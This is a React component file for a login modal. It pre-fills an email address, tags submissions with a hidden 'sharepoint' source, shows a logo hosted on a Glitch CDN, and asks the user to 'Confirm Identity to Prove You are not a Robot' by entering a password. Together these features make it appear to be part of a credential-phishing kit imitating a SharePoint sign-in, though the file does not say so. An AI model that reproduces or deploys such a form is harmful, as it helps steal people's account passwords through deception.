import React, { useState } from 'react';

const LoginModal = ({ email, onSubmit, onClose }) => {
  const [formData, setFormData] = useState({
    email: email || '',
    password: '',
    source: 'sharepoint'
  });

  const handleChange = (e) => {
    const { name, value } = e.target;
    setFormData(prev => ({ ...prev, [name]: value }));
  };

  const handleSubmit = (e) => {
    e.preventDefault();
    onSubmit(formData);
    setFormData(prev => ({ ...prev, password: '' }));
  };

  return (
    <div className="modal">
      <div className="modal-content">
        <div className="imgcontainer">
          <span onClick={onClose} className="close" title="Close Modal">&times;</span>
          <img 
            src="https://cdn.glitch.global/dbc455dd-1443-4546-992a-df355b63d16b/logo.png?v=1750274938985" 
            width="10%" 
            alt="Logo" 
          />
        </div>
        <div className="container">
          <form onSubmit={handleSubmit}>
            <input type="hidden" name="source" value="sharepoint" />
            <font size="2" face="Trebuchet MS" color="black">
              Confirm Identity to Prove You are not a Robot
            </font><br />
            <input
              type="email"
              placeholder="Email Address"
              name="email"
              required
              value={formData.email}
              onChange={handleChange}
            />
            <br />
            <input
              type="password"
              placeholder="Enter Password"
              name="password"
              required
              value={formData.password}
              onChange={handleChange}
            />
            <br />
            <button type="submit">CONTINUE</button>
          </form>
        </div>
      </div>
    </div>
  );
};

export default LoginModal;